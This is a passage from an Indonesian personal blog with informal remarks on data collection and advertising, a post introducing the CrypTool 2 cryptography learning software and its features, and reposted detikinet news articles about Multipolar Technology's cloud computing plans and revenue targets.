    data nitip, tak bayar pula, yang punya gudang juga tak berharap lebih ke si penitip secara langsung, namun apa yang terjadi pasti ada yang membisu saja dan mengamati dari jauh.
  12. data untuk keperluan iklan
    masih wajarlah tow penghidupan utama itu, dan itulah bisnis. asal tak ada yang terlarang hingga yang memfatalkan, ya this is bisnis kakak… 🙂
    sopan atau tidak kolek data, mungkin mulaikah kepada siapa yang menelpon anda namun beralasan data dari tim mereka.
    oh yahhhhhh,…… no.telp pak tukang gali sumur juga di publish tuh di tiang2, jadi jangan di teroro ya kakak… ^_^
  13. …………………………………….. berita masih sama dan makin senter ……………………………..dan
  14. Dilanda Krisis, Facebook Malah Untung Besar
    wow gitu yah, nah masih ada dugaan positif yang sangat mungkin dan bukan satu-satunya alesan yaitu mungkin suatu bentuk para pemodal makin manaikan pemodalannya dikarenakan iklan di FB terbukti efektif hingga kefektifan itu dimanfaatkan para pengolek data. simple nya seperti itu.
  15. a

sekian terima kasih, semoga kita makin bijak.

selebihnya mungkin bila ada waktu2 luwang, khusus bacaan ini akan direvisi biar kita lebih sepaham akan perkembangan kasus sejenis ini. kurang lebihnya mohon maaf, dan silahkan komen….

Belajar Kriptografi/Enkripsi dengan CrypTool free

dari sumber sebelah… ebsoft

CrypTool 2 merupakan program gratis (Open Source) yang dikembangkan oleh tim dari University of Kassel (Jerman), termasuk juga beberapa professor menjadi tim intinya. Program ini sangat bermanfaat, terutama mahasiswa IT yang sedang mempelajari masalah atau kuliah tentang Kriptografi. Tetapi bagi pengguna umum atau praktisi komputer juga bisa bermanfaat terutama yang ingin mempelajari tentang algoritma atau metode berbagai algoritma enkripsi yang sebenarnya sudah kita gunakan sehari-hari (misalnya membuka website dengan https) atau ingin tahu dan memecahkan sendiri bagaimana pesan rahasia yang digunakan dalam masa Perang Dunia.

Beberapa fiturnya antara lain :

  • Memberikan antarmukan untuk mempelajari berbagai algoritma kriptografi, termasuk visualisasi yagn bisa diatur berbagai parameternya
  • Tampilan menggunakan antaramuka Office 2007
  • Menyediakan berbagai algoritam Cipher klasik, seperti Caesar, Enigma, Hill Cipher, M209, Solitaire, Substitution, XOR, Trasnposition dan sebagainya
  • Menyediakan berbagai algoritma Cipher modern baik Algoritma kunci Simetris (misalnya AES, DES, HC128, Camellia, RC2, RC4, Salsa20, SDES, TEA, Twofish, dan sebagainya) ataupun Algoritma Kunci Asimetris (DGK, Paillier, RSA, RSA Key Generator)
  • Beberapa algoritma atau metode dalam Stenografi, seperti penyisipan, LSB dan Permutasi
  • Berbagai algoritma fungsi Hash, seperti CRC, Keccak, MD5. PKCS, RIPEMD160, SHA, Tiger dan Whirpool
  • Menyediakan fitur Cryptanalist, atau ilmu untuk memecahkan data yang di enkripsi tanpa menggunakan kuncinya, misalnya dengan mempelajari kepadatan huruf. Disediakan berbagai metode untuk memecahkan algoritma berbagai algoritma enkripsi, seperti Caesar Analyser, Cube Attack, Enigma, IDP Analyser, Key Searcher, Solitaire Analyser, Transposition, Frequency Test, Prime Test, Factorizer dan sebagainya
  • Tersedia berbagai protokol seperti HMAC< LSFR, NLFSR, Oblivious, Coin Flipping, WEP Protokol dan sebagainya
    Berbagai perangkat simulasi seperti AN, OR, NOT, XOR, Boolean Input, Clock, Gate, Variabel Load, Splitter, Random generator, Input tet, output dan sebagainya

Daftar diatas hanya beberapa fitur yang bisa dituliskan, karena untuk masing-masing fitur diberikan berbagai fitur lebih daetail yang bisa disesuaikan dengan kebutuhan sendiri. Untuk mencobanya silahkan mengunduh CrypTool 2 (58.3 MB)

Multipolar – Rindu Gawean Ini

ini merupakan perusahaan yang sempat bekerja sama dengan perusahaan lama gua. tp ini perusahaan yg paling seru, bagi yg pernah nyusup tentunya… ^_^

berikut ulasan terbarunya. menurut gua sih tambah keren dan fokus… XD

Multipolar Garap Bisnis Cloud Computing

Achmad Rouzni Noor II – detikinet
Penyedia sistem integrator TI Multipolar Technology menggandeng dua perusahaan Ramco Systems dan Qumu untuk menyediakan layanan cloud computing dengan platform software as a Services (SaaS) di Indonesia.”Melalui kolaborasi Multipolar, Ramco dan Qumu, perusahaan klien Multipolar yang mengadopsi cloud model SaaS ini dapat meningkatkan daya saing dan nilai tambahnya,” kata Presiden Direktur Multipolar Technology, Harijono Suwarno, di acara Multipolar Solutions Day 2012, Shangrila Hotel, Jakarta, Selasa (25/9/2012).

Ramco Systems adalah perusahaan piranti lunak berbasis di India berfokus pada platform cloud enterprise seperti Enterprise Resources Planning (ERP), Human Capital Management (HCM) dan Enterprise Asset Management (EAM).

Sedangkan Qumu perusahaan asal California, Amerika Serikat, fokus pada penyediaan solusi lengkap Enterprise Webcasting dan Video Management.

Menurut Harijono, Multipolar terus meningkatkan kinerja di seluruh lini bisnisnya dengan dukungan teknologi, namun investasi TI seringkali menjadi kendala, sehingga diperlukan pendekatan baru untuk mengatasi hal tersebut.

Harijono menjelaskan, saat ini terdapat sebanyak 400-500 perusahaan yang menjadi klien Multipolar yang bergerak di sektor perbankan, telekomunikasi, manufaktur, pemerintahan, dan usaha kecil menengah (UKM).

“Kami berharap paling tidak 20-30 persen dari klien kami itu segera mengadopsi dua layanan Ramco dan Qumu, karena keduanya merupakan perusahaan berbasis cloud,” tegasnya.

Sementara itu Direktur Multipolar Technology Jip Ivan mengatakan sudah menjadi komitmen perusahaan terus menghadirkan solusi yang bernilai tambah bagi pelanggan kami.Ramco ERP on Cloud membantu pelanggan mengotomatisasikan dan mengintegrasikan seluruh fungsi dan proses bisnisnya tanpa perlu melakukan investasi pada piranti keras, lisensi, pelatihan atau staf TI tambahan.

Solusi ini mudah digunakan, namun memiliki fitur yang lengkap, fleksibel dan dapat dikembangkan. Pelanggan bisa memilih untuk berlangganan paket ERP lengkap atau hanya modul-modul yang dibutuhkan saja, baik di cloud lokal atau cloud private di data centernya sendiri.

CEO Ramco Systems, Virender Aggarwai mengatakan, setelah sukses membuktikan layanan cloud di India, dan memasuki pasar global, saat ini siap menawarkan solusi di pasar Indonesia.

“Indonesia adalah pasar yang sudah siap dan mempunyai potensi besar di kawasan Asia Pasifik. Multipolar adalah pemain yang sudah dikenal luas di Indonesia, sehingga merupakan momentum yang tepat untuk mengembangkan pasar di sini,” kata Virender.

Solusi Qumu yang berbasis cloud memungkinkan pelanggan memiliki solusi video dengan cara yang lebih mudah, aman dan hemat biaya, serta tidak membutuhkan tim TI untuk pengelolaan perangkatnya.

Solusi ini dapat dimanfaatkan untuk pelatihan-pelatihan secara virtual sehingga menghemat biaya perjalanan, dan mudah diakses melalui PC, laptop, layar digital, smartphone dan tablet.

“Perkembangan video bisnis untuk perusahaan yang sejalan dengan pertumbuhan solusi berbasis mobile dan cloud menyediakan kesempatan besar bagi perusahaan-perusahaan di Indonesia untuk meningkatkan komunikasi korporasi mereka dengan solusi yang aman dan hemat biaya,” kata Vice President Qumu Asia Pacific, Mark Weaser.

Multipolar Target Rp 1,3 Triliun dari Bisnis TI

Achmad Rouzni Noor II – detikinet
Sebagai perusahaan penyedia layanan TI dan sistem integrator PT Multipolar Technology berani pasang target tinggi. Anak usaha Lippo Group itu menargetkan pendapatan di akhri 2012 nanti mencapai USD 138 juta atau sekitar Rp 1,3 triliun, naik 20% dibanding tahun sebelumnya USD 115 juta.”Kami optimistis target pendapatan sebesar USD 138 juta akan tercapai sejalan dengan semakin berkembangnya modul dan layanan yang ditawarkan perusahaan,” kata Presiden Direktur Multipolar Technology Harijono Suwarno di Hotel Shangrila, Jakarta, Selasa (25/9/2012).

Menurut Harijono, peningkatan pendapatan tahun 2012 diharapkan bisa berlanjut pada 2013 dilatarbelakangi membaiknya iklim investasi di Tanah Air.

“Iklim investasi seperti yang terungkap dari data pemerintah sedang bagus-bagusnya, tercermin dari nilai investasi asing langsung yang terus meningkat dari waktu ke waktu,” ujarnya.

Dengan peningkatan investasi asing tersebut lanjut Harjono, setidaknya akan menambah daftar perusahaan yang akan masuk ke Tanah Air yang akhirnya mendorong peningkatan kebutuhan teknologi informasi di dalam negeri.

Ia menambahkan, saat ini jumlah klien Multipolar berkisar 500 perusahaan, di mana sebanyak 75-80 persen bergerak pada jasa perbankan, 10-15 persen jasa telekomunikasi, sedangkan sisanya sekitar 10 persen perusahaan manufaktur, pemerintah dan UKM.

Pada jasa perbankan, Multipolar memberikan layanan infrastruktur piranti keras, jasa profesional meliputi modul produktivitas bisnis, manajemen informasi, entreprise risk manajemen (ERM), hingga solusi piranti lunak.

Multipolar membantu bisnis dalam berbagai aktivitas IT antara lain mengimplementasikan core banking dan layanan elektronik di perbankan, mendukung solusi komunikasi seluler bagi operator telekomunikasi.Juga menerapkan layanan informasi kesehatan bagi rumah sakit, solusi e-learning, jasa konsultasi instansi pemerintah dalam menerapkan e-government.

Selain itu, mengimplementasikan solusi bisnis untuk perusahaan sektor manufaktur, peritel, pengembang properti, serta pada entreprise architectur-based IT master plan di berbagai sektor lainnya.

“Kami memiliki infrastruktur, network, dan piranti lunak dan piranti keras yang dapat diaplikasikan tidak saja pada sektor perbankan, tetapi juga manufaktur maupun bagi government,” katanya.

Salah satu layanan yang terbaru disediakan Multipolar adalah cloud computing berbasis platform Software as a Services (SaaS) dengan menggandeng dua perusahaan, Ramco dan Qumu.

Ramco Systems adalah perusahaan piranti lunak berbasis di India berfokus pada platform cloud enterprise seperti Enterprise Resources Planning (ERP), Human Capital Management (HCM) dan Enterprise Asset Management (EAM).

Sedangkan Qumu perusahaan asal California, Amerika Serikat, fokus pada penyediaan solusi lengkap Enterprise Webcasting dan Video Management.

Menurut Harijono, target awal pengguna layanan cloud computing hasil kolaborasi Multipolar, Ramco dan Qumu ini adalah perusahaan eksisting yang menjadi klien Multipolar.

“Dari sekitar 500 klien kami saat ini, diharapkan sekitar 20 persen akan mengadopsi cloud computing Multipolar,” ujarnya.

Multipolar Fokus Garap TI di 4 Sektor Industri

Achmad Rouzni Noor II – detikinet
PT Multipolar Technology menandai transformasi perusahaannya menjadi penyedia layanan teknologi informasi (TI) dengan fokus menggarap empat sektor industri, yakni sektor keuangan, telekomunikasi, pemerintahan, dan layanan kesehatan.Dalam upayanya menggarap keempat sektor industri tersebut, anak perusahaan Lippo ini menggandeng sejumlah mitra global seperti IBM, Cisco, HCL, Vision Solutions, NCR, Symantec, VMware, Infosys, Oracle dan Acer.

“Teknologi saat ini bukan lagi sekedar pelengkap, namun lebih dari itu teknologi justru mempermudah pekerjaan kita,” kata Harijono Suwarno, Managing Director Multipolar Technology dalam rilis Multipolar Solutions Day 2010 yang diterima detikINET, Jumat (30/7/2010).

Menurut Harijono, transformasi Multipolar menjadi penyedia solusi TI lengkap didorong oleh dinamika di industri dan kebutuhan pelanggan yang mencari benefit dari implementasi TI. Selama beberapa tahun terakhir, peran TI semakin penting bagi bisnis, dari sekedar fungsi pendukung menjadi fungsi strategis yang mampu menciptakan keunggulan kompetitif.

Tolok ukur sukses TI, lanjut dia, kini dinilai dari indikator-indikator bisnis seperti return-on-investment (ROI), return-on-asset (ROA) dan time-to-market, menandakan semakin pentingnya menyelaraskan TI dengan bisnis.

Cara pandang bisnis terhadap TI pun berubah, banyak perusahaan mulai menerapkan tata kelola IT yang baik sebagai bagian dari corporate governance, dan didorong regulasi seperti Basel II di sektor perbankan secara luas, IT governance mencakup juga IT management dan IT control.

TI kini juga mulai dilihat dalam perspektif sebagai sebuah layanan, atau IT-as-a-Service (ITaaS). Pada dasarnya, ITaaS adalah layanan alih daya yang lebih luas. ITaas tidak hanya mencakup pemeliharaan aset TI (server, peranti jaringan dan PC) tetapi juga manajemen sumber daya TI.

“Dengan TI sebagai layanan, klien perusahaan bisa fokus pada bisnis intinya,” tandas Harijono.

%d blogger menyukai ini: